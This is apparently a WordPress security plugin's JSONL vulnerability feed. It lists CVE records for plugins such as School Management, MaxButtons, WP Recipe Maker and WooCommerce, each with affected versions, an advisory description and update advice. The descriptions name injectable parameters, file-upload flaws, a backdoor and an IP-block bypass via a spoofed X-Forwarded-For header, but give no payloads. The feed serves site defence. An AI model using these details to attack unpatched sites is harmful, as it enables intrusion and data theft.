Current File : /home/n/i/c/nicedoo/www/wp-content/uploads/security-ninja/vulns/plugins_vulns.jsonl

{"CVE_ID":"CVE-2024-12609","slug":"school-management","versionImpact":"92.0.0","versionEndExcluding":"93.0.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to SQL Injection via the 'view-attendance' page in all versions up to, and including, 92.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query in the mj_smgt_view_student_attendance() function.  This makes it possible for authenticated attackers, with Student-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 93.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8790df5-7228-4854-870c-1e6d3d0cfbaa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8790df5-7228-4854-870c-1e6d3d0cfbaa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12607","slug":"school-management","versionImpact":"92.0.0","versionEndExcluding":"93.0.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter of the 'mj_smgt_show_event_task' AJAX action in all versions up to, and including, 92.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Custom-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 93.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175fe7f4-ac92-4c52-9889-47635c21cd9b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175fe7f4-ac92-4c52-9889-47635c21cd9b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9660","slug":"school-management","versionImpact":"91.5.0","versionEndExcluding":"92.0.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the mj_smgt_load_documets_new() and mj_smgt_load_documets() functions in all versions up to, and including, 91.5.0. This makes it possible for authenticated attackers, with Student-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 92.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b36fc50-7573-466e-883e-8d26f243c4d0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b36fc50-7573-466e-883e-8d26f243c4d0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9659","slug":"school-management","versionImpact":"91.5.0","versionEndExcluding":"92.0.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the mj_smgt_user_avatar_image_upload() function in all versions up to, and including, 91.5.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 92.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff1f303f-17fc-4006-b21b-5846216995da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff1f303f-17fc-4006-b21b-5846216995da?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2170","slug":"vk-all-in-one-expansion-unit","versionImpact":"9.96.0.1","versionEndExcluding":"9.97.0.0","description":"The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the child page index widget in all versions up to, and including, 9.96.0.1 due to insufficient input sanitization and output escaping on user supplied attributes such as 'className.' This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.97.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bc697b3-20f6-46df-a250-f2009a60200e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bc697b3-20f6-46df-a250-f2009a60200e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3058212%40vk-all-in-one-expansion-unit&new=3058212%40vk-all-in-one-expansion-unit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3058212%40vk-all-in-one-expansion-unit&new=3058212%40vk-all-in-one-expansion-unit&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11181","slug":"greenshift-animation-and-page-builder-blocks","versionImpact":"9.9.9.3","versionEndExcluding":"9.9.9.4","description":"The Greenshift \u2013 animation and page builder blocks plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 9.9.9.3 via the 'wp_reusable_render' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 9.9.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php#L1236\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php#L1236\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203829\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203829\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06047667-2a24-4e1c-9389-11daceff4d23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06047667-2a24-4e1c-9389-11daceff4d23?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1609","slug":"school-management-pro","versionImpact":"9.9.6","versionEndExcluding":"9.9.7","description":"The School Management WordPress plugin before 9.9.7 contains an obfuscated backdoor injected in its license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.","recommendation":"Update to version 9.9.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2d546c9-85b6-47a4-b951-781b9ae5d0f2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2d546c9-85b6-47a4-b951-781b9ae5d0f2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1207","slug":"booking","versionImpact":"9.9","versionEndExcluding":"9.9.1","description":"The WP Booking Calendar plugin for WordPress is vulnerable to SQL Injection via the 'calendar_request_params[dates_ddmmyy_csv]' parameter in all versions up to, and including, 9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 9.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7802ed1f-138c-4a3d-916c-80fb4f7699b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7802ed1f-138c-4a3d-916c-80fb4f7699b2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032596%40booking&new=3032596%40booking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032596%40booking&new=3032596%40booking&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4442","slug":"salon-booking-system","versionImpact":"9.8","versionEndExcluding":"9.9","description":"The Salon booking system plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 9.8. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.","recommendation":"Update to version 9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaafeadd-f44c-49b1-b900-ef40800c629e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaafeadd-f44c-49b1-b900-ef40800c629e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088196\\\/salon-booking-system#file14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088196\\\/salon-booking-system#file14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/tags\\\/9.8\\\/src\\\/SLN\\\/Action\\\/Ajax\\\/RemoveUploadedFile.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/tags\\\/9.8\\\/src\\\/SLN\\\/Action\\\/Ajax\\\/RemoveUploadedFile.php#L5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0937","slug":"vk-all-in-one-expansion-unit","versionEndExcluding":"9.87.1.0","description":"The VK All in One Expansion Unit WordPress plugin before 9.87.1.0 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5110ff02-c721-43eb-b13e-50aca25e1162\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5110ff02-c721-43eb-b13e-50aca25e1162\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0230","slug":"vk-all-in-one-expansion-unit","versionEndExcluding":"9.86.0.0","description":"The VK All in One Expansion Unit WordPress plugin before 9.86.0.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a4ad73b2-6a70-48ff-bf4c-28f81b193748\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a4ad73b2-6a70-48ff-bf4c-28f81b193748\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1503","slug":"wp-recipe-maker","versionImpact":"9.8.0","versionEndExcluding":"9.8.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Roundup Recipe Name field in all versions up to, and including, 9.8.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254687\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-list-saver.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254687\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-list-saver.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e23f63a0-3061-42e0-a6be-05fa20a174ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e23f63a0-3061-42e0-a6be-05fa20a174ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8968","slug":"maxbuttons","versionImpact":"9.8.0","versionEndExcluding":"9.8.1","description":"The WordPress Button Plugin MaxButtons WordPress plugin before 9.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 9.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cab4d23e-e857-4b2f-b1ca-fbafd37524e0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cab4d23e-e857-4b2f-b1ca-fbafd37524e0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10555","slug":"maxbuttons","versionImpact":"9.8.0","versionEndExcluding":"9.8.1","description":"The WordPress Button Plugin MaxButtons WordPress plugin before 9.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 9.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcc97635-e939-4cb4-9851-6f6ac4f6ad47\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcc97635-e939-4cb4-9851-6f6ac4f6ad47\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6499","slug":"maxbuttons","versionImpact":"9.7.8","versionEndExcluding":"9.8.0","description":"The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 9.7.8. This makes it possible for unauthenticated attackers to obtain the full path to instances, which they may be able to use in combination with other vulnerabilities or to simplify reconnaissance work. On its own, this information is of very limited use.","recommendation":"Update to version 9.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdd0694c-ea7e-4cf8-a8d8-82a2b02fecdf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdd0694c-ea7e-4cf8-a8d8-82a2b02fecdf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxbuttons\\\/trunk\\\/assets\\\/libraries\\\/font-awesome-5\\\/convert.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxbuttons\\\/trunk\\\/assets\\\/libraries\\\/font-awesome-5\\\/convert.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3140369\\\/maxbuttons\\\/tags\\\/9.8.0\\\/assets\\\/libraries\\\/font-awesome-5\\\/convert.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3140369\\\/maxbuttons\\\/tags\\\/9.8.0\\\/assets\\\/libraries\\\/font-awesome-5\\\/convert.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4470","slug":"wp-reviews-plugin-for-google","versionEndExcluding":"9.8","description":"The Widgets for Google Reviews WordPress plugin before 9.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7c4e51b3-87ef-4afc-ab53-9a9bbdcfc9d7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7c4e51b3-87ef-4afc-ab53-9a9bbdcfc9d7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4889","slug":"shareaholic","versionImpact":"9.7.8","versionEndExcluding":"9.7.9","description":"The Shareaholic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'shareaholic' shortcode in versions up to, and including, 9.7.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.7.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff6932c6-f3ec-46a8-a03b-95512eee5bf1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff6932c6-f3ec-46a8-a03b-95512eee5bf1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2995413\\\/shareaholic#file51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2995413\\\/shareaholic#file51\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3026","slug":"maxbuttons","versionImpact":"9.7.7","versionEndExcluding":"9.7.8","description":"The WordPress Button Plugin MaxButtons WordPress plugin before 9.7.8 does not sanitise and escape some parameters, which could allow users with a role as low as editor to perform Cross-Site Scripting attacks","recommendation":"Update to version 9.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aba9d8a5-20a7-49e5-841c-9cfcb9bc6144\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aba9d8a5-20a7-49e5-841c-9cfcb9bc6144\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7029","slug":"maxbuttons","versionImpact":"9.7.6","versionEndExcluding":"9.7.7","description":"The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including 9.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially fixed in version 9.7.6.","recommendation":"Update to version 9.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bca0e8a0-d837-42d8-a9d3-35e0c820eb43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bca0e8a0-d837-42d8-a9d3-35e0c820eb43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024075\\\/maxbuttons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024075\\\/maxbuttons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6594","slug":"maxbuttons","versionImpact":"9.7.4","versionEndExcluding":"9.7.6","description":"The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 9.7.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. Administrators can give button creation privileges to users with lower levels (contributor+) which would allow those lower-privileged users to carry out attacks.","recommendation":"Update to version 9.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfe2cabd-98f6-4ebc-8a02-e6951202aa88?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfe2cabd-98f6-4ebc-8a02-e6951202aa88?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012872%40maxbuttons%2Ftrunk&old=2978023%40maxbuttons%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012872%40maxbuttons%2Ftrunk&old=2978023%40maxbuttons%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4620","slug":"booking","versionImpact":"9.7.3","versionEndExcluding":"9.7.3.1","description":"The Booking Calendar WordPress plugin before 9.7.3.1 does not sanitize and escape some of its booking form data, allowing unauthenticated users to perform Stored Cross-Site Scripting attacks against administrators","recommendation":"Update to version 9.7.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/084e9494-2f9e-4420-9bf7-78a1a41433d7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/084e9494-2f9e-4420-9bf7-78a1a41433d7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9650","slug":"wp-recipe-maker","versionImpact":"9.6.1","versionEndExcluding":"9.7.0","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018tooltip\u2019 parameter in all versions up to, and including, 9.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/085d06e1-31d3-4c01-8d8e-588c04b79ae3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/085d06e1-31d3-4c01-8d8e-588c04b79ae3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recipe-maker\\\/trunk\\\/assets\\\/js\\\/public\\\/tooltip.js#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recipe-maker\\\/trunk\\\/assets\\\/js\\\/public\\\/tooltip.js#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173494\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173494\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-36503","slug":"maxbuttons","versionEndExcluding":"9.6","description":"Auth. (contributor+) Cross-Site Scripting (XSS) vulnerability in Max Foundry WordPress Button Plugin MaxButtons plugin <=\u00a09.5.3 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/maxbuttons\\\/wordpress-wordpress-button-plugin-maxbuttons-plugin-9-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/maxbuttons\\\/wordpress-wordpress-button-plugin-maxbuttons-plugin-9-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4100","slug":"wp-cerber","versionImpact":"9.4","versionEndExcluding":"9.5","description":"The WP Cerber Security plugin for WordPress is vulnerable to IP Protection bypass in versions up to, and including 9.4 due to the plugin improperly checking for a visitor's IP address. This makes it possible for an attacker whose IP address has been blocked to bypass this control by setting the X-Forwarded-For: HTTP header to an IP Address that hasn't been blocked.","recommendation":"Update to version 9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03ccd474-42f4-4cbb-823e-93fe4db1bf80?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03ccd474-42f4-4cbb-823e-93fe4db1bf80?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2865322\\\/wp-cerber\\\/trunk\\\/cerber-common.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2865322\\\/wp-cerber\\\/trunk\\\/cerber-common.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3490","slug":"wp-recipe-maker","versionImpact":"9.3.1","versionEndExcluding":"9.4.0","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wprm-recipe-roundup-item shortcode in all versions up to, and including, 9.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69cc7b6c-b6c2-4bba-afb4-86ba1b36b295?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69cc7b6c-b6c2-4bba-afb4-86ba1b36b295?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078644\\\/wp-recipe-maker\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078644\\\/wp-recipe-maker\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5062","slug":"woocommerce","versionImpact":"9.4.2","versionEndExcluding":"9.3.4","description":"The WooCommerce plugin for WordPress is vulnerable to PostMessage-Based Cross-Site Scripting via the 'customize-store' page in all versions up to, and including, 9.4.2 due to insufficient input sanitization and output escaping on PostMessage data. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to one of the following versions, or a newer patched version: 9.3.4, 9.4.3","refs":"[{\"url\":\"https:\\\/\\\/developer.woocommerce.com\\\/2024\\\/12\\\/03\\\/woocommerce-9-4-3-and-woocommerce-9-3-4-available-now\\\/\",\"name\":\"https:\\\/\\\/developer.woocommerce.com\\\/2024\\\/12\\\/03\\\/woocommerce-9-4-3-and-woocommerce-9-3-4-available-now\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/blob\\\/08dbc3b7dea140dd5dc19ee9c9ecd47dac0605b6\\\/plugins\\\/woocommerce\\\/client\\\/admin\\\/client\\\/customize-store\\\/utils.js#L39C1-L56C2\",\"name\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/blob\\\/08dbc3b7dea140dd5dc19ee9c9ecd47dac0605b6\\\/plugins\\\/woocommerce\\\/client\\\/admin\\\/client\\\/customize-store\\\/utils.js#L39C1-L56C2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/pull\\\/53405\\\/files\",\"name\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/pull\\\/53405\\\/files\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc2ee5bb-eeb8-4134-8f3f-b411e56457f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc2ee5bb-eeb8-4